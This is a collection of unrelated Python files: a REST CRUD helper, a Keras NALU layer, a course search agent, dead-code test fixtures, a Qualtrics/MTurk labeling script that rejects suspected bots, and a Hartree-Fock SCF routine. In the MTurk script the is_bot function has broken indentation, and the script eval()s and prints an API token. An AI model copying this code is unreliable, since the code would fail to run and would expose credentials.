    return {field: value for field, value in payload.items() if field in allowed}
def create_object(self, data=None, save=True, parent_resources=None):
    """Instantiate a new document from the validated data and optionally
    save it. Returns the (possibly unsaved) document."""
    field_values = self.get_object_dict(data)
    obj = self.document(**field_values)
    # Remember which fields were set so related objects can be saved.
    self._dirty_fields = field_values.keys()
    if save:
        self.save_object(obj)
    return obj
def update_object(self, obj, data=None, save=True, parent_resources=None):
    """Apply validated data to `obj`, tracking the fields that actually
    changed in self._dirty_fields, and optionally save it.
    """
    # Delegate to a more specific sub-resource when one is registered
    # for this document subclass.
    subresource = self._subresource(obj)
    if subresource:
        return subresource.update_object(
            obj, data=data, save=save, parent_resources=parent_resources
        )
    update_dict = self.get_object_dict(data, update=True)
    self._dirty_fields = []
    for field, value in update_dict.items():
        update = False
        # If we're comparing reference fields, only compare ids without
        # hitting the database
        if hasattr(obj, "_db_data") and isinstance(
            obj._fields.get(field), ReferenceField
        ):
            db_val = obj._db_data.get(field)
            id_from_obj = db_val and getattr(db_val, "id", db_val)
            id_from_data = value and getattr(value, "pk", value)
            if id_from_obj != id_from_data:
                update = True
        elif not equal(getattr(obj, field), value):
            update = True
        # Only assign (and mark dirty) fields whose value really changed.
        if update:
            setattr(obj, field, value)
            self._dirty_fields.append(field)
    if save:
        self.save_object(obj)
    return obj
def delete_object(self, obj, parent_resources=None):
    """Delete `obj` from the database."""
    obj.delete()
|
from keras.engine import Layer
from keras.engine import InputSpec
from keras import initializers
from keras import regularizers
from keras import constraints
from keras import backend as K
from keras.utils.generic_utils import get_custom_objects
class NALU(Layer):
    """Neural Arithmetic Logic Unit layer.

    Learns W = tanh(W_hat) * sigmoid(M_hat) and computes an additive
    path a = x.W alongside a multiplicative path
    m = exp(log(|x| + epsilon).W). With gating enabled, the output is
    g * a + (1 - g) * m where g = sigmoid(x.G); otherwise it is a + m.

    # Reference:
        - [Neural Arithmetic Logic Units](https://arxiv.org/abs/1808.00508)
    """

    def __init__(self, units,
                 use_gating=True,
                 kernel_W_initializer='glorot_uniform',
                 kernel_M_initializer='glorot_uniform',
                 gate_initializer='glorot_uniform',
                 kernel_W_regularizer=None,
                 kernel_M_regularizer=None,
                 gate_regularizer=None,
                 kernel_W_constraint=None,
                 kernel_M_constraint=None,
                 gate_constraint=None,
                 epsilon=1e-7,
                 **kwargs):
        """
        Neural Arithmetic and Logical Unit.
        # Arguments:
            units: Output dimension.
            use_gating: Bool, determines whether to use the gating
                mechanism between W and m.
            kernel_W_initializer: Initializer for `W` weights.
            kernel_M_initializer: Initializer for `M` weights.
            gate_initializer: Initializer for gate `G` weights.
            kernel_W_regularizer: Regularizer for `W` weights.
            kernel_M_regularizer: Regularizer for `M` weights.
            gate_regularizer: Regularizer for gate `G` weights.
            kernel_W_constraint: Constraints on `W` weights.
            kernel_M_constraint: Constraints on `M` weights.
            gate_constraint: Constraints on gate `G` weights.
            epsilon: Small factor to prevent log 0.
        # Reference:
        - [Neural Arithmetic Logic Units](https://arxiv.org/abs/1808.00508)
        """
        # BUG FIX: forward **kwargs (e.g. `name`, `input_shape`, `dtype`)
        # to the base Layer; previously they were accepted but silently
        # discarded.
        super(NALU, self).__init__(**kwargs)
        self.units = units
        self.use_gating = use_gating
        self.epsilon = epsilon
        self.kernel_W_initializer = initializers.get(kernel_W_initializer)
        self.kernel_M_initializer = initializers.get(kernel_M_initializer)
        self.gate_initializer = initializers.get(gate_initializer)
        self.kernel_W_regularizer = regularizers.get(kernel_W_regularizer)
        self.kernel_M_regularizer = regularizers.get(kernel_M_regularizer)
        self.gate_regularizer = regularizers.get(gate_regularizer)
        self.kernel_W_constraint = constraints.get(kernel_W_constraint)
        self.kernel_M_constraint = constraints.get(kernel_M_constraint)
        self.gate_constraint = constraints.get(gate_constraint)
        self.supports_masking = True

    def build(self, input_shape):
        """Create W_hat, M_hat and (optionally) the gate kernel G."""
        assert len(input_shape) >= 2
        input_dim = input_shape[-1]
        self.W_hat = self.add_weight(shape=(input_dim, self.units),
                                     name='W_hat',
                                     initializer=self.kernel_W_initializer,
                                     regularizer=self.kernel_W_regularizer,
                                     constraint=self.kernel_W_constraint)
        self.M_hat = self.add_weight(shape=(input_dim, self.units),
                                     name='M_hat',
                                     initializer=self.kernel_M_initializer,
                                     regularizer=self.kernel_M_regularizer,
                                     constraint=self.kernel_M_constraint)
        if self.use_gating:
            self.G = self.add_weight(shape=(input_dim, self.units),
                                     name='G',
                                     initializer=self.gate_initializer,
                                     regularizer=self.gate_regularizer,
                                     constraint=self.gate_constraint)
        else:
            self.G = None
        self.input_spec = InputSpec(min_ndim=2, axes={-1: input_dim})
        self.built = True

    def call(self, inputs, **kwargs):
        """Combine the additive and multiplicative arithmetic paths."""
        W = K.tanh(self.W_hat) * K.sigmoid(self.M_hat)
        # Multiplicative path in log space; epsilon guards log(0).
        m = K.exp(K.dot(K.log(K.abs(inputs) + self.epsilon), W))
        a = K.dot(inputs, W)
        if self.use_gating:
            g = K.sigmoid(K.dot(inputs, self.G))
            outputs = g * a + (1. - g) * m
        else:
            outputs = a + m
        return outputs

    def compute_output_shape(self, input_shape):
        """Same shape as the input except the last axis becomes `units`."""
        assert input_shape and len(input_shape) >= 2
        assert input_shape[-1]
        output_shape = list(input_shape)
        output_shape[-1] = self.units
        return tuple(output_shape)

    def get_config(self):
        """Return the layer config so the layer can be re-instantiated."""
        config = {
            'units': self.units,
            'use_gating': self.use_gating,
            'kernel_W_initializer': initializers.serialize(self.kernel_W_initializer),
            'kernel_M_initializer': initializers.serialize(self.kernel_M_initializer),
            'gate_initializer': initializers.serialize(self.gate_initializer),
            'kernel_W_regularizer': regularizers.serialize(self.kernel_W_regularizer),
            'kernel_M_regularizer': regularizers.serialize(self.kernel_M_regularizer),
            'gate_regularizer': regularizers.serialize(self.gate_regularizer),
            'kernel_W_constraint': constraints.serialize(self.kernel_W_constraint),
            'kernel_M_constraint': constraints.serialize(self.kernel_M_constraint),
            'gate_constraint': constraints.serialize(self.gate_constraint),
            'epsilon': self.epsilon
        }
        base_config = super(NALU, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
get_custom_objects().update({'NALU': NALU})
|
""" File name: health_agents.py
Author: Jeff Yuanbo Han (u6617017)
Date: 8 March 2018
Description: This file contains agents which fight disease. It is used
in Exercise 4 of Assignment 0.
"""
import random
class HealthAgent:
    """ A simple disease fighting agent. """

    def __init__(self, locations, conn):
        """ This constructor does nothing except save the locations and conn.
        Feel free to overwrite it when you extend this class if you want
        to do some initial computation.
        (HealthAgent, [str], { str : set([str]) }) -> None
        """
        self.locations = locations
        self.conn = conn

    def choose_move(self, location, valid_moves, disease, threshold, growth, spread):
        """ Using given information, return a valid move from valid_moves.
        Returning an invalid move will cause the system to stop.
        Changing any of the mutable parameters will have no effect on the
        operation of the system.
        This agent greedily moves to the neighbouring location with the
        highest disease level; if there is no nearby disease, it acts
        randomly.
        (HealthAgent, str, [str], [str], { str : float }, float, float, float) -> str
        """
        best_move = None
        best_level = None
        for candidate in valid_moves:
            level = disease[candidate]
            if best_level is None or level > best_level:
                best_level = level
                best_move = candidate
        # All nearby disease levels are zero (or there were no moves to
        # inspect): wander randomly instead of chasing nothing.
        if not best_level:
            return random.choice(valid_moves)
        return best_move
# Make a new agent here called SmartHealthAgent, which extends HealthAgent and
# acts a bit more sensibly. Feel free to add other helper functions if needed.
class SmartHealthAgent(HealthAgent):
    """ A smart disease fighting agent. This agent will move one step along a shortest path
    to somewhere. That path has the highest priority of all shortest paths to reachable locations.
    It is accomplished in 3 steps:
    1. For each reachable place, find by Uniform Cost Search a shortest path from location to it.
    2. Compute the severity of each node, and then compute the priority of each path obtained in 1.
    3. Move one step along a path with the highest priority.
    See more details for step-1 in uc_search method, and for step-2 and 3 in choose_move method.
    """
    def __init__(self, locations, conn):
        """ Save the locations and conn as HealthAgent does.
        (HealthAgent, [str], { str : set([str]) }) -> None
        """
        super().__init__(locations, conn)
    def choose_move(self, location, valid_moves, disease, threshold, growth, spread):
        """ First, derive the distance as well as a shortest path from location to each reachable node,
        by the method of Uniform Cost Search Algorithm. Then compute related statistics (defined
        below). Finally, move one step along a path with the highest priority.
        Define a statistic for each node called "severity":
            severity[loc] = disease[loc] * len(conn[loc]), if disease[loc] < threshold;
                            disease[loc] ** 2 / threshold * len(conn[loc]), otherwise.
        severity[loc] depicts very well how serious the pandemic is in loc.
        Two essential features are reflected:
        1. It is much more serious when disease[loc] >= threshold, because it spreads to its neighbors.
        2. The potential threat to neighbors is counted in by multiplying len(conn[loc]).
           For example, a location with 3 neighbors is intuitively more serious than another of the
           same disease level but with 2 neighbors.
        Define the "priority" of a road (a path from location to somewhere) as:
            priority[road] = sum([severity[node] for node in road]) / dist(road_target),
        where road_target is the final destination of this road.
        This to some extent reflects the average severity of nodes in a path.
        Based on discussions above, all that we need now is moving one step along a path with the
        highest priority.
        (SmartHealthAgent, str, [str], [str], {str: float}, float, float, float) -> str
        """
        from operator import itemgetter
        move = None
        # Find the distance as well as a shortest path from location to each reachable node.
        dist, path = self.uc_search(location)
        # Compute severity for each node (see docstring for the formula).
        severity = {}
        for loc in self.locations:
            if disease[loc] < threshold:
                severity[loc] = disease[loc] * len(self.conn[loc])
            else:
                severity[loc] = disease[loc] ** 2 / threshold * len(self.conn[loc])
        # Compute priority for each shortest path.  The current location gets its
        # raw severity as priority (its distance is 0, so the ratio is undefined).
        priority = {location: severity[location]}
        for target in path:
            priority[target] = sum([severity[node] for node in path[target]]) / dist[target]
        # Move one step along a path with the highest priority.  Both branches
        # break immediately, so only the single top-ranked target is used.
        ranking = sorted(priority.items(), key=itemgetter(1), reverse=True)
        ranked_targets = [x[0] for x in ranking]
        for target in ranked_targets:
            if target == location:
                # Staying put outranks every reachable target.
                move = location
                break
            else:
                # path[target] is [location, first_step, ..., target]; take the first step.
                move = path[target][1]
                break
        # If there is no reachable node at all, just hopelessly move in random.
        if not move:
            return random.choice(valid_moves)
        return move
    def uc_search(self, location):
        """ Call: dist, path = self.uc_search(location)
        Compute the distances from location to any other place in self.locations
        by Uniform Cost Search. (We shall call each of the locations a node.)
        All edges have cost 1, so this behaves as a shortest-hop search.
        The distance to an unreachable node is set as inf (i.e. math.inf).
        The output is
            dist: { "X" : the shortest distance from location to X }
            path: { "X" : [a shortest path from location to X] }
        where X goes through all nodes in self.locations.
        However in path, X must be reachable (i.e. dist[X] < inf).
        (SmartHealthAgent, str) -> {str: num}, {str: [str]}
        """
        from math import inf
        # Restore [self.locations] in a set {locations}, in case that the returned paths
        # are determined by the order in [self.locations].
        locations = set(self.locations)
        dist = dict((loc, inf) for loc in locations) # Initialize all distances as inf.
        dist[location] = 0 # The distance is 0 from location to itself.
        path = {}
        current = location # The currently being-operated node, starting with location.
        visited = set() # The set of nodes that have already been visited.
        while len(visited) < len(locations):
            visited.add(current)
            # Check new connected nodes, and update the distance if it shortens.
            for neighbor in self.conn[current]:
                if dist[current] + 1 < dist[neighbor]:
                    dist[neighbor] = dist[current] + 1
                    path[neighbor] = [current] # Record the last node passed by.
            # Choose a nearest unvisited node to operate for the next loop.
            # This selection will be arbitrary if there exists more than one candidate,
            # since {locations} is a set with no order.
            candidate_dist = inf
            for candidate in locations:
                if candidate in visited: continue
                if dist[candidate] < candidate_dist:
                    candidate_dist = dist[candidate]
                    current = candidate
            # No candidates? Because all remaining nodes are isolated! Must break.
            if current in visited: break
        # Connect all the passing-by nodes to obtain complete paths.
        # Each path entry is a reversed predecessor chain; extending with an
        # already-expanded chain still terminates because it ends at location.
        for target in path:
            while path[target][-1] != location :
                path[target].extend( path[ path[target][-1] ] )
        # Invert the order and add the final destination to each path.
        for target in path:
            path[target].reverse()
            path[target].append(target)
        return dist, path
|
def main():
    # NOTE(review): every branch below is deliberately dead or unreachable code —
    # presumably fixtures for an unreachable-code detector; confirm before "fixing".
    if False:
        print(1)
        def while_unreachable():
            # Body of `while False` never runs; only print(3) would execute.
            while False:
                print(1)
                print(2)
            print(3)
        def while_unreachable2():
            print("Hello")
            while False:
                print(1)
                print(2)
            print(3)
    else:
        print(1)
        def if_unreachable_condition():
            print("World")
            # Condition is constant-false: 4 == 5 is False and 11 + 2 == 0 is False.
            if 4 == 5 or 11 + 2 == 0:
                print(1)
|
import requests
import zipfile
import json
import io, os
import sys
import re
import socket
import pandas as pd
import reverse_geocoder as rg
import numpy as np
from glob import glob
import argparse
import boto3
import shutil
def get_args_from_command_line():
    """Parse and return the command line arguments for this script."""
    parser = argparse.ArgumentParser()
    # Survey/country selection.
    parser.add_argument("--country_code", type=str, default="US")
    parser.add_argument("--surveyId", type=str)
    parser.add_argument("--iteration_number", type=str)
    # Bot-handling behaviour.
    parser.add_argument("--reject_bots", type=int, default=0)
    parser.add_argument("--HITId", type=str, default=None)
    parser.add_argument("--discard_x", type=int, default=3)
    # Which API token to load.
    parser.add_argument("--sam_API", type=int)
    return parser.parse_args()
def exportSurvey(apiToken, surveyId, dataCenter, fileFormat, path_to_data):
    """Download all responses of a Qualtrics survey and unzip them locally.

    Follows the legacy responseexports API flow: create an export job,
    poll until it finishes, then download the zip and extract it into
    path_to_data/surveyId.

    params
        apiToken:: Qualtrics API token string
        surveyId:: survey identifier (expected to look like "SV_...")
        dataCenter:: Qualtrics data-center subdomain (e.g. 'nyu.ca1')
        fileFormat:: export format, e.g. 'csv'
        path_to_data:: directory under which the export is extracted

    Raises:
        Exception: when the export job reports a "failed" status.
    """
    # Setting static parameters for the polling loop.
    requestCheckProgress = 0.0
    progressStatus = "inProgress"
    baseUrl = "https://{0}.qualtrics.com/API/v3/responseexports/".format(dataCenter)
    headers = {
        "content-type": "application/json",
        "x-api-token": apiToken,
    }
    # Step 1: Creating Data Export
    downloadRequestUrl = baseUrl
    downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
    downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
    progressId = downloadRequestResponse.json()["result"]['id']
    print(downloadRequestResponse.text)
    # Step 2: Checking on Data Export Progress and waiting until export is ready
    while progressStatus != "complete" and progressStatus != "failed":
        print("progressStatus=", progressStatus)
        requestCheckUrl = baseUrl + progressId
        requestCheckResponse = requests.request("GET", requestCheckUrl, headers=headers)
        requestCheckProgress = requestCheckResponse.json()["result"]["percentComplete"]
        print("Download is " + str(requestCheckProgress) + " complete")
        progressStatus = requestCheckResponse.json()["result"]["status"]
    # Step 2.1: Check for error.  BUG FIX: the original compared with
    # `is "failed"` (identity against a literal), which only worked by
    # CPython string-interning accident; use equality instead.
    if progressStatus == "failed":
        raise Exception("export failed")
    # Step 3: Downloading file
    requestDownloadUrl = baseUrl + progressId + '/file'
    requestDownload = requests.request("GET", requestDownloadUrl, headers=headers, stream=True)
    # Step 4: Unzipping the file
    zipfile.ZipFile(io.BytesIO(requestDownload.content)).extractall(
        os.path.join(path_to_data, surveyId))
    print('Complete')
def fill_assignment_worker_ids_dict(assignments_dict, assignment_worker_ids_dict):
    """Add a WorkerId -> AssignmentId entry for every assignment in the page.

    assignments_dict is one page of an MTurk list_assignments_for_hit
    response; the mapping is updated in place and also returned.
    """
    for assignment in assignments_dict['Assignments']:
        assignment_worker_ids_dict[assignment['WorkerId']] = assignment['AssignmentId']
    return assignment_worker_ids_dict
if __name__ == "__main__":
    args = get_args_from_command_line()
    path_to_data = f'/scratch/mt4493/twitter_labor/twitter-labor-data/data/qualtrics/{args.country_code}/iter{args.iteration_number}/labeling'
    # Load the Qualtrics API token from one of two key locations.
    # NOTE(review): the sam_API branch eval()s the file content — presumably the
    # token is stored as a quoted string literal there; verify, eval is risky.
    if args.sam_API == 1:
        with open('/scratch/spf248/twitter/data/keys/qualtrics/apiToken', 'r') as f:
            apiToken = eval(f.readline())
    else:
        with open('/scratch/mt4493/twitter_labor/twitter-labor-data/data/keys/qualtrics/apiToken.txt', 'r') as f:
            apiToken = f.readline()
    print(apiToken)
    # Export Survey: wipe any previous export for this survey, then re-download.
    if os.path.exists(
            os.path.join(path_to_data, args.surveyId)):
        print("Overwriting existing folder")
        shutil.rmtree(os.path.join(path_to_data, args.surveyId), ignore_errors=True)
    if not re.compile('^SV_.*').match(args.surveyId):
        print("survey Id must match ^SV_.*")
    else:
        exportSurvey(apiToken=apiToken, surveyId=args.surveyId, dataCenter='nyu.ca1', fileFormat='csv',
                     path_to_data=path_to_data)
    # Pick the exported CSV whose filename contains 'labor-market-tweets'.
    file_path = \
        [file for file in glob(os.path.join(path_to_data, args.surveyId, '*.csv')) if 'labor-market-tweets' in file][0]
    # Analyse Results
    df = pd.read_csv(file_path, low_memory=False)
    # First two rows contain metadata
    df.drop([0, 1], inplace=True)
    # Keep one row per worker, indexed by QIDWorker.
    df = df.loc[(df['QIDWorker'].dropna().drop_duplicates().index)].set_index('QIDWorker').copy()
    # places = rg.search(
    #     [tuple(x) for x in df[['LocationLatitude', 'LocationLongitude']].astype(float).dropna().values.tolist()])
    print('# of workers who refused the consent form:', (df.QIDConsent.astype(int) == 0).sum())
    print('# of workers who did not complete the survey:', (df.Finished.astype(int) == 0).sum())
    # Metadata columns not needed for labeling analysis.
    to_drop = [
        'ResponseID',
        'ResponseSet',
        'IPAddress',
        'StartDate',
        'EndDate',
        'RecipientLastName',
        'RecipientFirstName',
        'RecipientEmail',
        'ExternalDataReference',
        'Finished',
        'Status',
        'Random ID',
        'QIDConsent',
        'QIDDescription',
        'QIDCompletion',
        'LocationLatitude',
        'LocationLongitude',
        'LocationAccuracy']
    df.drop(to_drop, 1, inplace=True, errors='ignore')
    df.drop([x for x in df.columns if 'BR-FL_' in x], 1, inplace=True, errors='ignore')
    print('# Workers:', df.shape[0])
    # Checks: isolate the quality-check question columns.
    checks = df[[col for col in df.columns if 'check' in col]].copy()
    checks.columns.name = 'QID'
    # Rearrange Results into long format (one row per worker/question).
    checks = checks.stack().rename('score').to_frame()
    # Extract Check ID
    checks['check_id'] = checks.index.get_level_values('QID').map(
        lambda x: re.findall('check-(\d)', x)[0])
    # Extract Class ID
    checks['class_id'] = checks.index.get_level_values('QID').map(
        lambda x: re.findall('_(\d)', x)[0])
    # Sort Values
    checks = checks.reset_index(level='QIDWorker').sort_values(
        by=['QIDWorker', 'check_id', 'class_id']).set_index(
        ['QIDWorker', 'check_id', 'class_id'])
    # Bot=Fail to give a Yes to the 2 check questions
def is_bot(x):
l = x.split('_')
if len(l) == 10:
if l[1] == '1' and l[4] == '2' and l[8] == '1' and l[9] == '2':
if l[0] == '1' and l[2] == '2' and l[3] == '2' and l[5] == '2' and l[
6] == '2' and l[7] == '2':
return 3
else:
return 2
elif (l[1] == '1' and l[4] == '2') is not (l[8] == '1' and l[9] == '2'):
return 1
return 0
    # Workers failing every check (score 0 from is_bot) are treated as bots.
    bots = checks.unstack(
        level='check_id').unstack(
        level='class_id').fillna('').apply(
        lambda x: '_'.join(x), 1).apply(is_bot).where(
        lambda x: x == 0).dropna().index
    print('# Workers who failed both check questions (= bots?):', bots.shape[0])
    print('# Worker ID of workers who failed both check questions (= bots?):', bots)
    workers_1_question_right = checks.unstack(
        level='check_id').unstack(
        level='class_id').fillna('').apply(
        lambda x: '_'.join(x), 1).apply(is_bot).where(
        lambda x: x == 1).dropna().index
    print('# Workers who just passed one check:', workers_1_question_right.shape[0])
    workers_2_question_right = checks.unstack(
        level='check_id').unstack(
        level='class_id').fillna('').apply(
        lambda x: '_'.join(x), 1).apply(is_bot).where(
        lambda x: x == 2 ).dropna().index
    print('# Workers who passed the two check questions:', workers_2_question_right.shape[0])
    good_turkers = checks.unstack(
        level='check_id').unstack(
        level='class_id').fillna('').apply(
        lambda x: '_'.join(x), 1).apply(is_bot).where(
        lambda x: x == 3).dropna().index
    print('# Workers who answered all questions right for the two check blocks:', good_turkers.shape[0])
    # Workers scoring below --discard_x have their labels dropped later on.
    bots_to_be_discarded = checks.unstack(
        level='check_id').unstack(
        level='class_id').fillna('').apply(
        lambda x: '_'.join(x), 1).apply(is_bot).where(
        lambda x: x < args.discard_x).dropna().index
    if args.reject_bots == 1:
        # Load AWS credentials and reject the detected bots' MTurk assignments.
        keys_path = '/scratch/mt4493/twitter_labor/twitter-labor-data/data/keys/mturk'
        with open(os.path.join(keys_path, 'access_key_id.txt'), 'r') as f:
            access_key_id = f.readline().strip()
        with open(os.path.join(keys_path, 'secret_access_key.txt'), 'r') as f:
            secret_access_key = f.readline().strip()
        # Per-country rejection message shown to the worker.
        requester_feedback_dict = {
            'US': f'We are sorry to tell you that you have not passed the quality checks for HIT {args.HITId} (questions on English tweets). Therefore, we must reject your assignment. Thank you for your understanding',
            'MX': f'Lamentamos comunicarle que no ha superado los controles de calidad de HIT {args.HITId} (preguntas sobre los tweets en español). Por lo tanto, debemos rechazar su asignación. Gracias por su comprensión.',
            'BR': f'Lamentamos dizer que você não passou nos controles de qualidade do HIT {args.HITId} (perguntas sobre tweets portugueses). Portanto, devemos rejeitar sua tarefa. Obrigado por sua compreensão.'
        }
        mturk = boto3.client('mturk',
                             aws_access_key_id=access_key_id,
                             aws_secret_access_key=secret_access_key,
                             region_name='us-east-1',
                             endpoint_url='https://mturk-requester.us-east-1.amazonaws.com'
                             )
        # terminate HIT
        mturk.update_expiration_for_hit(
            HITId=args.HITId,
            ExpireAt=0
        )
        print('HIT was terminated')
        # Page through all assignments to map WorkerId -> AssignmentId.
        assignments_dict = mturk.list_assignments_for_hit(
            HITId=args.HITId,
        )
        assignment_worker_ids_dict = dict()
        while 'NextToken' in assignments_dict.keys():
            assignment_worker_ids_dict = fill_assignment_worker_ids_dict(assignments_dict=assignments_dict,
                                                                         assignment_worker_ids_dict=assignment_worker_ids_dict)
            assignments_dict = mturk.list_assignments_for_hit(
                HITId=args.HITId,
                NextToken=assignments_dict['NextToken']
            )
        # Handle the (single-page) case where no NextToken was ever returned.
        if 'NextToken' not in assignments_dict.keys() and assignments_dict['NumResults'] > 0:
            assignment_worker_ids_dict = fill_assignment_worker_ids_dict(assignments_dict=assignments_dict,
                                                                         assignment_worker_ids_dict=assignment_worker_ids_dict)
        for bot_id in bots:
            # Tag the worker with the "bot" qualification, then reject their work.
            try:
                mturk.associate_qualification_with_worker(
                    QualificationTypeId='3RDXJZR9A1H33MQ79TZZWYBXX8WCYD',
                    WorkerId=bot_id,
                    IntegerValue=1,
                    SendNotification=False)
                print(f'Assigned bot qualification to bot {bot_id}')
            except:
                print(f'Failed to assign bot qualification to bot {bot_id}')
            if bot_id in assignment_worker_ids_dict.keys():
                assignment_id = assignment_worker_ids_dict[bot_id]
                try:
                    mturk.reject_assignment(
                        AssignmentId=assignment_id,
                        RequesterFeedback=requester_feedback_dict[args.country_code]
                    )
                except:
                    print(f'Not able to reject assignment for bot {bot_id} ')
        print('Reject assignments for detected bots')
    # Remove checks
    df.drop([col for col in df.columns if 'check' in col], 1, inplace=True)
    df.columns.name = 'QID'
    # Rearrange Results
    df = df.stack().rename('score').to_frame()
    # Extract Tweets ID (Removing Extra Indexing)
    df['tweet_id'] = df.index.get_level_values('QID').map(
        lambda x: re.sub('-v\d', '', x.replace('ID_', '').replace('.1', '')).split('_')[0])
    # Extract Classes (Removing Extra Indexing)
    df['class_id'] = df.index.get_level_values('QID').map(
        lambda x: re.sub('-v\d', '', x.replace('ID_', '').replace('.1', '')).split('_')[1])
    # Sort Values
    df = df.reset_index(level='QIDWorker').sort_values(
        by=['tweet_id', 'class_id', 'QIDWorker']).set_index(
        ['tweet_id', 'class_id', 'QIDWorker'])
    # Drop users who have failed at least one check
    df.drop(bots_to_be_discarded, level='QIDWorker', inplace=True, errors='ignore')
    # Convert Scores from Qualtrics codes to human-readable labels.
    df.score = df.score.apply(lambda x: {
        '1': 'yes',
        '2': 'no',
        '3': 'unsure'}[x])
    df.to_csv(
        os.path.join(path_to_data, args.surveyId, 'labels.csv'))
|
import numpy as np
from integrals import S, T, V, two_electron
def nuc_repulsion(molecule):
    """
    Calculate nuclear repulsion between atoms.

    Sums Z_i * Z_j / |R_i - R_j| over all unordered atom pairs.

    params
        molecule:: molecule object exposing `N` (atom count) and `atoms`,
                   each atom with a charge `Z` and a numpy `coord` vector

    Returns the total nuclear repulsion energy as a float (0.0 for a
    single atom).
    """
    retval = 0.
    for i in range(molecule.N):
        # j starts above i, so the old `if i == j: continue` was dead code.
        for j in range(i+1, molecule.N):
            atom_i, atom_j = molecule.atoms[i], molecule.atoms[j]
            retval += \
                atom_i.Z*atom_j.Z/np.linalg.norm(atom_i.coord-atom_j.coord)
    return retval
def calc_matrices(basis_set, molecule):
    """
    Build the one- and two-electron integral matrices.

    params
        basis_set:: list of basis object
        molecule:: molecule object

    Returns (kinetic, potential, overlap, twoe): three (N, N) arrays and
    the (N, N, N, N) two-electron tensor, N being len(basis_set).
    """
    n_basis = len(basis_set)
    # Initialize accumulators.
    kinetic = np.zeros((n_basis, n_basis))
    potential = np.zeros((n_basis, n_basis))
    overlap = np.zeros((n_basis, n_basis))
    twoe = np.zeros((n_basis, n_basis, n_basis, n_basis))
    # Each basis function is a contraction of (primitive, coefficient) pairs
    # exposed by `.gs`; accumulate every primitive combination.
    for i, basis_i in enumerate(basis_set):
        for g_i, d_i in basis_i.gs:
            for j, basis_j in enumerate(basis_set):
                for g_j, d_j in basis_j.gs:
                    contraction = d_i*d_j
                    kinetic[i,j] += contraction*T(g_i, g_j)
                    overlap[i,j] += contraction*S(g_i, g_j)
                    # Nuclear attraction: one term per nucleus.
                    for charge, center in zip(molecule.Zs, molecule.coords):
                        potential[i,j] += contraction*V(g_i, g_j, charge, center)
                    for k, basis_k in enumerate(basis_set):
                        for g_k, d_k in basis_k.gs:
                            for l, basis_l in enumerate(basis_set):
                                for g_l, d_l in basis_l.gs:
                                    twoe[i,j,k,l] += \
                                        two_electron(g_i, g_j, g_k, g_l) * \
                                        d_i*d_j*d_k*d_l
    return kinetic, potential, overlap, twoe
def calc_error(p_old, p):
    """
    Return the norm of the difference between two density matrices,
    used as the SCF convergence measure.
    """
    difference = p_old - p
    return np.linalg.norm(difference)
def orthogonalize(m):
    """
    Symmetric (Loewdin) orthogonalization of matrix m.

    Diagonalizes m, takes the inverse square root of its eigenvalues and
    transforms back: X = U s^(-1/2) U^T, so that X m X ~ identity.
    """
    eigvecs = np.linalg.eig(m)[1]
    diagonalized = eigvecs.T @ m @ eigvecs
    inv_sqrt = np.diag(np.diagonal(diagonalized) ** -0.5)
    return eigvecs @ inv_sqrt @ eigvecs.T
def run(basis_set, molecule, thr=1e-10, max_iter=1000):
    """
    Run the SCF Iteration.

    params
        basis_set:: list of basis object
        molecule:: molecule object
        thr:: convergence threshold on the density-matrix change
        max_iter:: safety cap on iterations (AssertionError when exceeded)

    Returns (P, C, e, E): density matrix, MO coefficients, sorted orbital
    energies of the last iteration, and the total electronic energy.
    """
    # Print Input Info
    print(f"### Molecule Info\n")
    print(molecule)
    # Number of basis function
    N = len(basis_set)
    # Calculate matrices
    kinetic, potential, overlap, twoe = \
        calc_matrices(basis_set, molecule)
    H_core = kinetic + potential
    X = orthogonalize(overlap)
    # Initialize P
    P = np.zeros((N, N))
    # Initialize error
    error = 1e9
    # Initialize counter
    cnt = 0
    # Start iteration
    print(f"### Start SCF")
    while error > thr:
        # Back-up P
        P_old = P.copy()
        # Electron-electron term: Coulomb minus half exchange.
        G_ee = np.zeros((N, N))
        for i in range(N):
            for j in range(N):
                for k in range(N):
                    for l in range(N):
                        G_ee[i,j] += P[k,l]*(twoe[i,j,l,k]-0.5*twoe[i,k,l,j])
        F = H_core + G_ee
        # Solving the Roothan equation
        # F' = X^TFX
        F_prime = np.dot(X.T, np.dot(F, X))
        # F'C' = C'e
        # Eigenvectors:: C'
        # Eigenvalues:: e
        eigenvalues, eigenvectors = np.linalg.eig(F_prime)
        # Sort orbitals by energy (eig returns them in no guaranteed order).
        e = eigenvalues[eigenvalues.argsort()]
        C_prime = eigenvectors[:,eigenvalues.argsort()]
        # C = XC'
        C = np.dot(X, C_prime)
        # Calculate new P: doubly occupied lowest orbital (closed-shell, 2 electrons).
        for i in range(N):
            for j in range(N):
                P[i,j] = 2*C[i,0]*C[j,0]
        error = calc_error(P_old, P)
        # Print log
        print(f"### {cnt}th iteration:: error - {error:.6f}")
        print(f"### Converged:: {error < thr}")
        cnt += 1
        assert cnt < max_iter, "### Iteration exceeds MAX counts"
    print(f"### SCF Converged!!!")
    # Calculate total electronic energy
    E = 0.0
    for i in range(N):
        for j in range(N):
            E += 0.5*P[j,i]*(H_core[i,j]+F[i,j])
    return P, C, e, E
# No standalone entry point yet; this module is import-only.
if __name__ == "__main__":
    pass
|
__author__ = "Marc Wang"
__copyright__ = "Copyright (c) 2021 MSAM Lab - University of Waterloo"
__license__ = "BSD-3-Clause"
__maintainer__ = "Marc Wang"
__email__ = "marc.wang@uwaterloo.ca"
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QDialogButtonBox, QDialog, QAbstractButton, QInputDialog, QMessageBox, QComboBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot, QObject
from versa3d.settings import SingleEntry, PrintSetting, SettingWrapper
import attr
class SettingsWindow(QDialog):
    """Dialog for browsing, creating, saving and deleting print-setting profiles.

    The dialog mirrors its profile selection into a slave combo box owned by
    the caller, and emits apply_setting_signal when Apply/Ok is pressed so
    every bound entry commits its edited value.
    """
    apply_setting_signal = pyqtSignal()

    def __init__(self, slave_cmb: QComboBox,
                 setting_obj: SettingWrapper,
                 parent: QObject = None):
        """Build the dialog.

        slave_cmb: external combo box kept in sync with this dialog's selection.
        setting_obj: wrapper exposing the named setting profiles.
        parent: optional Qt parent object.
        """
        super().__init__(parent=parent)
        self.setting_obj = setting_obj
        init_idx = slave_cmb.currentIndex()
